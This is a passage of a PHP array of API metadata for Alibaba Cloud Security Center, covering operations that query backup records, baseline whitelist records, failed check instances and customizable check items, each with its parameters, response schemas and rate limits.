['description' => 'The number of entries on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query backup records', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListBackupRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListBackupRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB48****\\",\\n \\"BackupRecordList\\": [\\n {\\n \\"Uuid\\": \\"b93cccb9-f19f-4886-97fe-47df26ba****\\",\\n \\"ClientId\\": \\"c-0002bgagelj3d2sc****\\",\\n \\"BackupPlanId\\": \\"plan-000c4tt43nolmx96****\\",\\n \\"BackupJobId\\": \\"a006f24d069843c88688672d74ee****\\",\\n \\"BackupStartTime\\": 1699514211000,\\n \\"BackupEndTime\\": 1699600611000,\\n \\"BackupStatus\\": \\"BACKUP_COMPLETE\\",\\n \\"ErrorCode\\": \\"FILE_CACHE_NO_SPACE\\",\\n \\"ErrorMessage\\": \\"FILE_CACHE_NO_SPACE\\",\\n \\"InstanceName\\": \\"openapi\\",\\n \\"Ip\\": \\"1.1.1.1\\",\\n \\"InstanceId\\": \\"i-wz9ikn44p46krnic****\\",\\n \\"InternetIp\\": \\"1.1.1.1\\\\n\\",\\n \\"IntranetIp\\": \\"192.168.1.1\\",\\n \\"RegionId\\": \\"cn-hangzhou\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 2,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": 20\\n }\\n}","type":"json"}]', ], 'ListBaselineCheckWhiteRecord' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckIds', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The list of check item IDs.', 'type' => 'array', 'items' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckItemWarningSummary](~~ListCheckItemWarningSummary~~) operation to obtain check item IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '58', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'RecordIds', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The list of whitelist record IDs.', 'type' => 'array', 'items' => ['description' => 'The ID of the whitelist record.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '496242', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. If this parameter is left empty, host data is queried by default. Valid values:'."\n" .'- **default**: host'."\n" .'- **agentless**: agentless.', 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CheckItemFuzzy', 'in' => 'query', 'schema' => ['description' => 'The check item name for fuzzy match.', 'type' => 'string', 'required' => false, 'example' => 'redis', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page when using paging. The value starts from 1. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page when using paging.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of whitelist rules.', 'type' => 'array', 'items' => [ 'description' => 'The whitelist rule.', 'type' => 'object', 'properties' => [ 'RecordId' => ['description' => 'The ID of the whitelist record.', 'type' => 'integer', 'format' => 'int64', 'example' => '79412', 'title' => ''], 'CheckId' => ['description' => 'The check item ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '696', 'title' => ''], 'TargetType' => ['description' => 'The type of the effective target. Valid values:'."\n" ."\n" .'- **all_instance**: all hosts'."\n" .'- **instance**: specific hosts.', 'type' => 'string', 'example' => 'instance', 'title' => ''], 'Target' => ['description' => 'The whitelisted target.', 'type' => 'string', 'example' => 'HOST_BASELINE_WHITE_LIST_21', 'title' => ''], 'Reason' => ['description' => 'The reason for adding to the whitelist.', 'type' => 'string', 'example' => '暂时忽略'."\n", 'title' => ''], 'Source' => ['description' => 'The data source. Valid values:'."\n" .'- **default**: host'."\n" .'- **agentless**: agentless.', 'type' => 'string', 'example' => 'agentless', 'title' => ''], 'Lang' => ['description' => 'The language type for requests and responses. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'example' => 'en', 'title' => ''], 'CheckItem' => ['description' => 'The description of the check item.', 'type' => 'string', 'example' => 'Config the Event Audit policys', 'title' => ''], 'CheckType' => ['description' => 'The category of the check item.', 'type' => 'string', 'example' => 'Security audit', 'title' => ''], 'CheckTypeDisName' => ['description' => 'The display name of the check item type.', 'type' => 'string', 'example' => 'Security audit', 'title' => ''], 'ContainerItems' => [ 'description' => 'The list of whitelisted container names in the check item.', 'type' => 'array', 'items' => [ 'description' => 'The whitelisted container name in the check item.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => 'beeea5c2-1857-4b2b-a794-7d21eae*****', 'title' => ''], 'ContainerNames' => ['description' => 'The whitelisted container names for the current asset, separated by commas.', 'type' => 'string', 'example' => '"anythingllm,ChuanhuChat"', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '45', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '9F4E6157-9600-5588-86B9-38F09067****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query baseline whitelist records', 'summary' => 'Queries baseline whitelist records.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListBaselineCheckWhiteRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListBaselineCheckWhiteRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"RecordId\\": 79412,\\n \\"CheckId\\": 696,\\n \\"TargetType\\": \\"instance\\",\\n \\"Target\\": \\"HOST_BASELINE_WHITE_LIST_21\\",\\n \\"Reason\\": \\"暂时忽略\\\\n\\",\\n \\"Source\\": \\"agentless\\",\\n \\"Lang\\": \\"en\\",\\n \\"CheckItem\\": \\"Config the Event Audit policys\\",\\n \\"CheckType\\": \\"Security audit\\",\\n \\"CheckTypeDisName\\": \\"Security audit\\",\\n \\"ContainerItems\\": [\\n {\\n \\"Uuid\\": \\"beeea5c2-1857-4b2b-a794-7d21eae*****\\",\\n \\"ContainerNames\\": \\"\\\\\\"anythingllm,ChuanhuChat\\\\\\"\\"\\n }\\n ]\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 45,\\n \\"Count\\": 2\\n },\\n \\"RequestId\\": \\"9F4E6157-9600-5588-86B9-38F09067****\\"\\n}","type":"json"}]', ], 'ListCheckInstanceResult' => [ 'summary' => 'Queries the instances that failed a specified check item of configuration assessment.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '119343', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '23', 'title' => ''], ], [ 'name' => 'Statuses', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The statuses of check items.', 'type' => 'array', 'items' => [ 'description' => 'The status of the check item. Valid values:'."\n" ."\n" .'- **PASS**'."\n" ."\n" .'- **NOT\\_PASS**'."\n" ."\n" .'- **CHECKING**'."\n" ."\n" .'- **NOT\\_CHECK**'."\n" ."\n" .'- **WHITELIST**', 'enumValueTitles' => [], 'type' => 'string', 'required' => false, 'example' => 'PASS', 'title' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'InstanceIdKey', 'in' => 'query', 'schema' => ['description' => 'The ID of the instance.', 'type' => 'string', 'required' => false, 'example' => 'i-uf64w4q6p9jti5gl****', 'title' => ''], ], [ 'name' => 'InstanceNameKey', 'in' => 'query', 'schema' => ['description' => 'The name of the instance.', 'type' => 'string', 'required' => false, 'example' => 'i-uf64w4q6p9jti5gl****'."\n", 'title' => ''], ], [ 'name' => 'RegionIdKey', 'in' => 'query', 'schema' => ['description' => 'The region ID of the instance.', 'type' => 'string', 'required' => false, 'example' => 'cn-qingdao', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Maximum value: 100.', 'type' => 'integer', 'format' => 'int32', 'maximum' => '100', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The instance IDs of cloud services.', 'type' => 'array', 'items' => ['description' => 'The instance ID of the cloud service.', 'type' => 'string', 'required' => false, 'example' => 'i-uf64w4q6p9jti5gl****', 'title' => ''], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'SortTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of the conditions based on which the check items are sorted.', 'type' => 'array', 'items' => [ 'description' => 'The type of the condition based on which the check items are sorted. Set the value to **STATUS**.', 'enumValueTitles' => [], 'type' => 'string', 'required' => false, 'example' => 'STATUS', 'title' => '', ], 'required' => false, 'maxItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '3AB18264-8A1B-52A6-A9AF-A886556E0F2E', 'title' => ''], 'BasicData' => [ 'description' => 'The basic information about the affected instances.', 'type' => 'array', 'items' => [ 'description' => 'The basic information about the instance.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the check result for the instance.', 'type' => 'integer', 'format' => 'int64', 'example' => '300054', 'title' => ''], 'Status' => ['description' => 'The states of check items. Multiple states are separated with commas (,). Valid values:'."\n" ."\n" .'- **PASS**: passed'."\n" ."\n" .'- **NOT\\_PASS**: failed'."\n" ."\n" .'- **CHECKING**: being checked'."\n" ."\n" .'- **NOT\\_CHECK**: not checked'."\n" ."\n" .'- **WHITELIST**: added to the whitelist', 'type' => 'string', 'example' => 'NOT_PASS', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the instance.', 'type' => 'string', 'example' => 'ap-southeast-1', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'example' => 'rm-m5es7ch1s62i4****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the server.', 'type' => 'string', 'example' => 'sg-t4nbk2aodzio52xv****', 'title' => ''], 'StatusMessage' => ['description' => 'The exception message of the check item.', 'type' => 'string', 'example' => '检查任务失败。', 'title' => ''], 'InstanceInfo' => [ 'description' => 'The information about the instance on which the check item is used.', 'type' => 'object', 'properties' => [ 'FirstUpdateTime' => ['description' => 'The time of the first check.', 'type' => 'integer', 'format' => 'int64', 'example' => '1716447535531', 'title' => ''], 'LastUpdateTime' => ['description' => 'The time of the last check.', 'type' => 'integer', 'format' => 'int64', 'example' => '1716447535531', 'title' => ''], 'Config' => [ 'description' => 'The information about the configuration item whose risks are fixed for the instance.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the configuration item, which is unique.', 'type' => 'string', 'example' => 'prot', 'title' => ''], 'Value' => ['description' => 'The value of the configuration item specified for the instance.', 'type' => 'string', 'example' => '8080', 'title' => ''], 'ShowName' => ['description' => 'The display name of the configuration item for internationalization.', 'type' => 'string', 'example' => 'prot', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'VendorUserName' => ['description' => 'The multi-cloud provider account name.', 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Columns' => [ 'description' => 'The metadata information about the search conditions that can be used to filter instances.', 'type' => 'array', 'items' => [ 'description' => 'The metadata information about the search condition that can be used to filter instances.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the check result for the instance. Valid values:'."\n" ."\n" .'- **text**'."\n" ."\n" .'- **link**', 'type' => 'string', 'example' => 'text', 'title' => ''], 'Key' => ['description' => 'The search condition.', 'type' => 'string', 'example' => 'RegionIdShow', 'title' => ''], 'ShowName' => ['description' => 'The display name of the search condition.', 'type' => 'string', 'example' => 'Region', 'title' => ''], 'Search' => [ 'description' => 'Indicates whether the search condition is used. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'enumValueTitles' => [], 'type' => 'boolean', 'example' => 'true', 'title' => '', ], 'SearchKey' => ['description' => 'The search key.', 'type' => 'string', 'example' => 'InstanceIdKey', 'title' => ''], 'Grids' => [ 'description' => 'The metadata information about the details of the instance.', 'type' => 'array', 'items' => [ 'description' => 'The metadata information about each item in the details of the instances.', 'type' => 'object', 'properties' => [ 'Type' => [ 'description' => 'The format of the check result for the instance. Valid values:'."\n" ."\n" .'- **text**'."\n" ."\n" .'- **link**', 'enumValueTitles' => [], 'type' => 'string', 'example' => 'text', 'title' => '', ], 'Key' => ['description' => 'The search condition.', 'type' => 'string', 'example' => 'RegionIdShow', 'title' => ''], 'ShowName' => ['description' => 'The display name of the search condition.', 'type' => 'string', 'example' => 'Region', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Checks' => [ 'description' => 'The extended information about the instances.', 'type' => 'array', 'items' => [ 'description' => 'The extended information about the instance.', 'type' => 'object', 'additionalProperties' => ['description' => 'The information about the check item.', 'type' => 'any', 'example' => '{'."\n" .' "InstanceIdShow": {'."\n" .' "link": "https://vpcnext.console.aliyun.com/vpc/cn-beijing/vpcs",'."\n" .' "value": "ngw-2zenx8j1lf5w8rcdhdqs5"'."\n" .' },'."\n" .' "RegionIdShow": {'."\n" .' "value": "China(Beijing)"'."\n" .' }'."\n" .' }', 'title' => ''], 'example' => '[{ "SecurityGroupNameShow": { "value": "Sas_Malicious_Ip_Security_Group" }, "InstanceIdShow": { "link": "https://ecs.console.aliyun.com/#/securityGroupDetail/region/ap-southeast-1/groupId/sg-t4nbk2aodzio52xvj00s/rule/intranetIngress", "value": "sg-t4nbk2aodzio52xv****" } }]', 'title' => '', ], 'example' => '[{'."\n" .' "SecurityGroupNameShow": {'."\n" .' "value": "Sas_Malicious_Ip_Security_Group"'."\n" .' },'."\n" .' "InstanceIdShow": {'."\n" .' "link": "https://ecs.console.aliyun.com/#/securityGroupDetail/region/ap-southeast-1/groupId/sg-t4nbk2aodzio52xvj00s/rule/intranetIngress",'."\n" .' "value": "sg-t4nbk2aodzio52xv****"'."\n" .' }'."\n" .'}]', 'title' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'string', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3AB18264-8A1B-52A6-A9AF-A886556E0F2E\\",\\n \\"BasicData\\": [\\n {\\n \\"Id\\": 300054,\\n \\"Status\\": \\"NOT_PASS\\",\\n \\"RegionId\\": \\"ap-southeast-1\\",\\n \\"InstanceId\\": \\"rm-m5es7ch1s62i4****\\",\\n \\"InstanceName\\": \\"sg-t4nbk2aodzio52xv****\\",\\n \\"StatusMessage\\": \\"检查任务失败。\\",\\n \\"InstanceInfo\\": {\\n \\"FirstUpdateTime\\": 1716447535531,\\n \\"LastUpdateTime\\": 1716447535531,\\n \\"Config\\": [\\n {\\n \\"Name\\": \\"prot\\",\\n \\"Value\\": \\"8080\\",\\n \\"ShowName\\": \\"prot\\"\\n }\\n ]\\n },\\n \\"VendorUserName\\": \\"test\\"\\n }\\n ],\\n \\"Columns\\": [\\n {\\n \\"Type\\": \\"text\\",\\n \\"Key\\": \\"RegionIdShow\\",\\n \\"ShowName\\": \\"Region\\",\\n \\"Search\\": true,\\n \\"SearchKey\\": \\"InstanceIdKey\\",\\n \\"Grids\\": [\\n {\\n \\"Type\\": \\"text\\",\\n \\"Key\\": \\"RegionIdShow\\",\\n \\"ShowName\\": \\"Region\\"\\n }\\n ]\\n }\\n ],\\n \\"Checks\\": [\\n {\\n \\"key\\": \\"{\\\\n \\\\\\"InstanceIdShow\\\\\\": {\\\\n \\\\\\"link\\\\\\": \\\\\\"https://vpcnext.console.aliyun.com/vpc/cn-beijing/vpcs\\\\\\",\\\\n \\\\\\"value\\\\\\": \\\\\\"ngw-2zenx8j1lf5w8rcdhdqs5\\\\\\"\\\\n },\\\\n \\\\\\"RegionIdShow\\\\\\": {\\\\n \\\\\\"value\\\\\\": \\\\\\"China(Beijing)\\\\\\"\\\\n }\\\\n }\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": \\"20\\"\\n }\\n}","type":"json"}]', 'title' => 'ListCheckInstanceResult', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckInstanceResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListCheckInstanceResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListCheckItem' => [ 'summary' => 'Queries the check items that can be customized.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '182732', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid value:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'TaskSources', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'List of task sources.', 'type' => 'array', 'items' => ['description' => 'Task source. The value can be:'."\n" ."\n" .'- **YAO\\_CHI**: YaoChi.', 'type' => 'string', 'required' => false, 'example' => 'YAO_CHI', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListCheckResultResponse', 'type' => 'object', 'properties' => [ 'CheckItems' => [ 'description' => 'The check items.', 'type' => 'array', 'items' => [ 'description' => 'Item information check.', 'type' => 'object', 'properties' => [ 'InstanceSubType' => ['description' => 'The asset subtype of the cloud service. Valid values:'."\n" ."\n" .'- If **InstanceType** is set to **ECS**, this parameter supports the following valid values:'."\n" ."\n" .' - **INSTANCE**'."\n" ."\n" .' - **DISK**'."\n" ."\n" .' - **SECURITY\\_GROUP**'."\n" ."\n" .'- If **InstanceType** is set to **ACR**, this parameter supports the following valid values:'."\n" ."\n" .' - **REPOSITORY\\_ENTERPRISE**'."\n" ."\n" .' - **REPOSITORY\\_PERSON**'."\n" ."\n" .'- If **InstanceType** is set to **RAM**, this parameter supports the following valid values:'."\n" ."\n" .' - **ALIAS**'."\n" ."\n" .' - **USER**'."\n" ."\n" .' - **POLICY**'."\n" ."\n" .' - **GROUP**'."\n" ."\n" .'- If **InstanceType** is set to **WAF**, this parameter supports the following valid value:'."\n" ."\n" .' - **DOMAIN**'."\n" ."\n" .'- If **InstanceType** is set to other values, this parameter supports the following valid values:'."\n" ."\n" .' - **INSTANCE**', 'type' => 'string', 'example' => 'INSTANCE', 'title' => ''], 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '21', 'title' => ''], 'CheckShowName' => ['description' => 'The name of the check item.', 'type' => 'string', 'example' => 'IPv4 Access Control', 'title' => ''], 'InstanceType' => ['description' => 'The asset type of the cloud service. Valid values:'."\n" ."\n" .'- **ECS**: Elastic Compute Service (ECS).'."\n" ."\n" .'- **SLB**: Server Load Balancer (SLB).'."\n" ."\n" .'- **RDS**: ApsaraDB RDS.'."\n" ."\n" .'- **MONGODB**: ApsaraDB for MongoDB (MongoDB).'."\n" ."\n" .'- **KVSTORE**: ApsaraDB for Redis (Redis).'."\n" ."\n" .'- **ACR**: Container Registry.'."\n" ."\n" .'- **CSK**: Container Service for Kubernetes (ACK).'."\n" ."\n" .'- **VPC**: Virtual Private Cloud (VPC).'."\n" ."\n" .'- **ACTIONTRAIL**: ActionTrail.'."\n" ."\n" .'- **CDN**: Alibaba Cloud CDN (CDN).'."\n" ."\n" .'- **CAS**: Certificate Management Service (formerly SSL Certificates Service).'."\n" ."\n" .'- **RDC**: Apsara Devops.'."\n" ."\n" .'- **RAM**: Resource Access Management (RAM).'."\n" ."\n" .'- **DDOS**: Anti-DDoS.'."\n" ."\n" .'- **WAF**: Web Application Firewall (WAF).'."\n" ."\n" .'- **OSS**: Object Storage Service (OSS).'."\n" ."\n" .'- **POLARDB**: PolarDB.'."\n" ."\n" .'- **POSTGRESQL**: ApsaraDB RDS for PostgreSQL.'."\n" ."\n" .'- **MSE**: Microservices Engine (MSE).'."\n" ."\n" .'- **NAS**: File Storage NAS (NAS).'."\n" ."\n" .'- **SDDP**: Sensitive Data Discovery and Protection (SDDP).'."\n" ."\n" .'- **EIP**: Elastic IP Address (EIP).', 'type' => 'string', 'example' => 'API_GATEWAY', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level of the check item. Valid values:'."\n" ."\n" .'- **HIGH**'."\n" ."\n" .'- **MEDIUM**'."\n" ."\n" .'- **LOW**', 'type' => 'string', 'example' => 'HIGH', 'title' => ''], 'Vendor' => ['description' => 'The type of the cloud asset. Valid values:'."\n" ."\n" .'- **0**: an asset provided by Alibaba Cloud.'."\n" ."\n" .'- **1**: an asset outside Alibaba Cloud.'."\n" ."\n" .'- **2**: an asset in a data center.'."\n" ."\n" .'- **3**, **4**, **5**, and **7**: other cloud asset.'."\n" ."\n" .'- **8**: a simple application server.', 'type' => 'string', 'example' => '0', 'title' => ''], 'SectionIds' => [ 'description' => 'The IDs of the sections associated with the check items.', 'type' => 'array', 'items' => ['description' => 'The ID of the section associated with the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '102', 'title' => ''], 'title' => '', 'example' => '', ], 'Description' => [ 'description' => 'The description of the check item.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the description of the check item. Valid value:'."\n" ."\n" .'- **text**', 'type' => 'string', 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'The content of the description for the check item when the Type parameter is text.', 'type' => 'string', 'example' => 'Checks whether strict access control policies are configured. Requirements: 1. If no blacklists and whitelist are configured, configure a whitelist first. 2. If a blacklist is configured, find the blacklist in the list of access control policies. We recommend that you do not configure an empty blacklist. 3. If a whitelist is configured, find the whitelist in the list of access control policies. We recommend that you do not configure an empty whitelist. Make sure that the whitelist does not contain 0.0.0.0. You can add the following IP addresses to the whitelist: ${IPList}.', 'title' => ''], ], 'title' => '', 'example' => '', ], 'CustomConfigs' => [ 'description' => 'The check items.', 'type' => 'array', 'items' => [ 'description' => 'User-defined check configuration information.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the check item.', 'type' => 'string', 'example' => 'IPList', 'title' => ''], 'TypeDefine' => ['description' => 'The type of the check item. The value is a JSON string.', 'type' => 'string', 'example' => '{\\"type\\":\\"LIST\\",\\"range\\":[1,512],\\"listType\\":{\\"type\\":\\"STRING\\",\\"range\\":[0,22]}}', 'title' => ''], 'DefaultValue' => ['description' => 'The default value of the check item. The value is a string.', 'type' => 'string', 'example' => '0', 'title' => ''], 'Value' => ['description' => 'The specified value of the check item. The value is a string.', 'type' => 'string', 'example' => '1', 'title' => ''], 'ShowName' => ['description' => 'The display name of the check item.', 'type' => 'string', 'example' => 'IP列表', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'EstimatedCount' => ['description' => 'The estimated quota that will be consumed by this check item.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'CheckType' => ['description' => 'The source type of the Situation Awareness check item:'."\n" ."\n" .'- **CUSTOM**: User-defined'."\n" ."\n" .'- **SYSTEM**: Predefined by the Situation Awareness platform', 'type' => 'string', 'example' => 'SYSTEM', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 